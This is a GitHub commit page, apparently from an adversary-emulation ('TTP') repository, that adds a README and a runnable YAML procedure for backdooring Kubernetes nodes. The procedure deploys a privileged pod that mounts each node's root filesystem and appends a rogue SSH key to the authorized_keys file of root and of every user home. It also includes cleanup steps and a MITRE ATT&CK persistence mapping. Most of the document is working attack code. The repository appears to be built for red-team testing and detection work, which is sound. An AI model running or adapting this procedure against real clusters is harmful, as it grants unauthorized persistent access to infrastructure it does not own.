Skip to content

Commit

Permalink
Added TTP to backdoor Kubernetes nodes with rogue SSH keys for persis…
Browse files Browse the repository at this point in the history
…tence

Summary:
**Added:**

- Created `backdoor-k8s-nodes-authorized-keys.yaml` TTP to inject rogue SSH keys into Kubernetes nodes
- Added steps for deploying a privileged pod to modify `authorized_keys` files on all nodes
- Included cleanup logic to restore original `authorized_keys` files after the attack
- Created a detailed `README.md` explaining arguments, requirements, and usage examples

**Changed:**

- Updated `extract-k8s-secrets/README.md` with correct example command for running TTP

Differential Revision: D61690546
  • Loading branch information
Jayson Grace authored and facebook-github-bot committed Aug 23, 2024
1 parent 113e4cb commit fd5a924
Show file tree
Hide file tree
Showing 2 changed files with 283 additions and 0 deletions.
Original file line number Diff line number Diff line change
@@ -0,0 +1,87 @@
# Backdoor Kubernetes Nodes with Authorized Keys

![Meta TTP](https://img.shields.io/badge/Meta_TTP-blue)

This TTP adds a rogue public SSH key to the `authorized_keys` file on all Kubernetes
nodes to maintain persistence. It assumes access to a Kubernetes cluster with the
ability to execute commands on the nodes. The TTP makes a backup of the original
`authorized_keys` file before overwriting it and restores it during cleanup.

## Arguments

- **artifacts_dir**: The directory to store the downloaded tools.

Default: /tmp

- **eks_cluster**: Indicates if the target Kubernetes cluster is running on EKS.

Default: true

- **rogue_key**: The rogue public SSH key to be added to the `authorized_keys` file.

- **ssh_authorized_keys**: Path to the `authorized_keys` file.

Default: `$HOME/.ssh/authorized_keys`

- **target_cluster**: The name of the target Kubernetes cluster.

- **target_ns**: The namespace for deploying the privileged pod.

Default: kube-system

- **target_region**: The region where the target cluster is located.

Default: us-east-1

## Requirements

1. Kubernetes cluster with access to run privileged commands and modify files on
the nodes.
1. `kubectl` installed and configured to interact with the target cluster.

### EKS

1. A valid set of AWS credentials. They can be provided through environment variables:

- `AWS_ACCESS_KEY_ID`
- `AWS_SECRET_ACCESS_KEY`
- `AWS_SESSION_TOKEN`

OR:

- `AWS_PROFILE`

1. The AWS CLI is installed.
1. The system should have `python3`, `pip3`, and `git` installed.

## Examples

You can run the TTP using the following command (adjust arguments as needed):

```bash
ttpforge run forgearmory//persistence/containers/k8s/backdoor-k8s-nodes-authorized-keys/backdoor-k8s-nodes-authorized-keys.yaml \
--arg rogue_key="ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGXY7PWSZ7QafZ5LsBxGVtAcAwn706dJENP1jXlX3fVa Test public key" \
--arg target_cluster=YOUR-CLUSTER-NAME
```

## Steps

1. **aws_connector**: Validates and sets up the AWS environment (if targeting an
EKS cluster).
1. **setup_kubeconfig_for_eks**: Sets up kubeconfig for EKS cluster (if targeting an
EKS cluster).
1. **create_privileged_pod_manifest**: Creates a privileged pod manifest for executing
commands on the nodes.
1. **deploy_privileged_pod**: Deploys the privileged pod in the target namespace.
1. **modify_authorized_keys_on_nodes**: Backs up and modifies the `authorized_keys`
file on all Kubernetes nodes, adding the rogue SSH key.
1. **cleanup**: Restores the original `authorized_keys` files and deletes the
privileged pod.

## MITRE ATT&CK Mapping

- **Tactics**:
- TA0003 Persistence
- **Techniques**:
- T1078 Valid Accounts

Original file line number Diff line number Diff line change
@@ -0,0 +1,196 @@
---
api_version: 2.0
uuid: 65a544be-d51e-416f-abc6-00e56c6bc911
name: backdoor_k8s_nodes_authorized_keys
description: |
This TTP adds a rogue public SSH key to the `authorized_keys` file on all Kubernetes nodes to maintain persistence.
It assumes access to a Kubernetes cluster with the ability to execute commands on the nodes. The TTP makes a backup of the original `authorized_keys` file before overwriting it and restores it during the cleanup.
args:
- name: artifacts_dir
description: The directory to store the downloaded tools.
default: /tmp
- name: eks_cluster
description: Target Kubernetes cluster is running on EKS.
default: true
- name: rogue_key
description: "The rogue public SSH key to be added"
- name: ssh_authorized_keys
default: "$HOME/.ssh/authorized_keys"
- name: target_cluster
description: The target Kubernetes cluster name.
- name: target_ns
description: The target namespace for deploying the privileged pod.
default: kube-system
- name: target_region
description: The region where the target cluster is located.
default: us-east-1
requirements:
platforms:
- os: linux
- os: darwin
mitre:
tactics:
- TA0003 Persistence
techniques:
- T1078 Valid Accounts

steps:
{{ if .Args.eks_cluster }}
- name: aws_connector
description: This step invokes the setup_cloud_env action.
ttp: //helpers/cloud/aws/validate-aws-env-configured.yaml
args:
region: "{{ .Args.target_region }}"

- name: setup_kubeconfig_for_eks
description: Set up kubeconfig for EKS cluster.
ttp: //helpers/containers/k8s/setup-kubeconfig-for-eks.yaml
args:
cluster_name: "{{ .Args.target_cluster }}"
cluster_region: "{{ .Args.target_region }}"
{{ end }}

- name: create_privileged_pod_manifest
description: Create the manifest for a privileged pod to run commands on the nodes.
inline: |
cat > {{ .Args.artifacts_dir }}/privileged_pod.yaml <<EOF
apiVersion: v1
kind: ServiceAccount
metadata:
name: privileged-sa
namespace: {{ .Args.target_ns }}
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: privileged-role
rules:
- apiGroups: [""]
resources:
- nodes/log
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: privileged-role-binding
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: privileged-role
subjects:
- kind: ServiceAccount
name: privileged-sa
namespace: {{ .Args.target_ns }}
---
apiVersion: v1
kind: Pod
metadata:
name: privileged-pod
namespace: {{ .Args.target_ns }}
spec:
serviceAccountName: privileged-sa
hostPID: true
containers:
- name: privileged
image: alpine:latest
securityContext:
privileged: true
command: ["/bin/sh"]
args: ["-c", "sleep infinity"]
volumeMounts:
- name: host-root
mountPath: /host
volumes:
- name: host-root
hostPath:
path: /
type: Directory
EOF
cleanup:
inline: rm {{ .Args.artifacts_dir }}/privileged_pod.yaml

- name: deploy_privileged_pod
description: Deploy the privileged pod in the target namespace.
inline: kubectl apply -f {{ .Args.artifacts_dir }}/privileged_pod.yaml -n {{ .Args.target_ns }}
cleanup:
inline: kubectl delete -f {{ .Args.artifacts_dir }}/privileged_pod.yaml -n {{ .Args.target_ns }}

- name: modify_authorized_keys_on_nodes
description: Backup and modify the authorized_keys file on all Kubernetes nodes.
inline: |
# Wait for the pod to be in the Running state
while true; do
POD_STATUS=$(kubectl get pod privileged-pod -n {{ .Args.target_ns }} --no-headers 2>/dev/null)
if [[ -z "$POD_STATUS" ]]; then
echo "Privileged pod not found. Waiting for it to appear..."
else
POD_PHASE=$(kubectl get pod privileged-pod -n {{ .Args.target_ns }} -o jsonpath='{.status.phase}' 2>/dev/null)
if [[ "$POD_PHASE" == "Running" ]]; then
echo "Privileged pod is running."
break
else
echo "Waiting for privileged pod to be running... Current phase: $POD_PHASE"
fi
fi
sleep 5
done
POD_NAME="privileged-pod"
kubectl exec -n {{ .Args.target_ns }} $POD_NAME -- /bin/sh -c '
if [ -d /host ]; then
echo "Success: Host file system is mounted at /host."
for user_home in /host/root /host/home/*; do
if [ -d "$user_home/.ssh" ]; then
AUTHORIZED_KEYS_PATH="$user_home/.ssh/authorized_keys"
echo "Checking authorized_keys at $AUTHORIZED_KEYS_PATH..."
if [ -f "$AUTHORIZED_KEYS_PATH" ]; then
echo "Found authorized_keys at $AUTHORIZED_KEYS_PATH"
cp "$AUTHORIZED_KEYS_PATH" "$AUTHORIZED_KEYS_PATH.bak" || true
echo "{{ .Args.rogue_key }}" >> "$AUTHORIZED_KEYS_PATH" || true
echo "Rogue key added to $AUTHORIZED_KEYS_PATH"
else
echo "Warning: authorized_keys not found at $AUTHORIZED_KEYS_PATH"
fi
else
echo "No .ssh directory found at $user_home, skipping..."
fi
done
else
echo "Failure: Host file system is not mounted at /host."
exit 1
fi
'
cleanup:
inline: |
# Check if the pod still exists before trying to clean up
POD_STATUS=$(kubectl get pod privileged-pod -n {{ .Args.target_ns }} --no-headers 2>/dev/null)
if [[ -n "$POD_STATUS" ]]; then
echo "Restoring original authorized_keys files..."
kubectl exec -n {{ .Args.target_ns }} privileged-pod -- /bin/sh -c '
if [ -d /host ]; then
echo "Restoring keys on host:"
for user_home in /host/root /host/home/*; do
if [ -d "$user_home/.ssh" ]; then
AUTHORIZED_KEYS_PATH="$user_home/.ssh/authorized_keys"
if [ -f "$AUTHORIZED_KEYS_PATH.bak" ]; then
cp "$AUTHORIZED_KEYS_PATH.bak" "$AUTHORIZED_KEYS_PATH" || true
rm "$AUTHORIZED_KEYS_PATH.bak" || true
echo "Restored authorized_keys at $AUTHORIZED_KEYS_PATH"
else
echo "Warning: backup file not found at $AUTHORIZED_KEYS_PATH.bak"
fi
else
echo "No .ssh directory found at $user_home, skipping..."
fi
done
else
echo "Failure: Host file system is not mounted at /host."
fi
'
else
echo "Privileged pod no longer exists. Skipping cleanup of authorized_keys."
fi
echo "Cleanup done!"

0 comments on commit fd5a924

Please sign in to comment.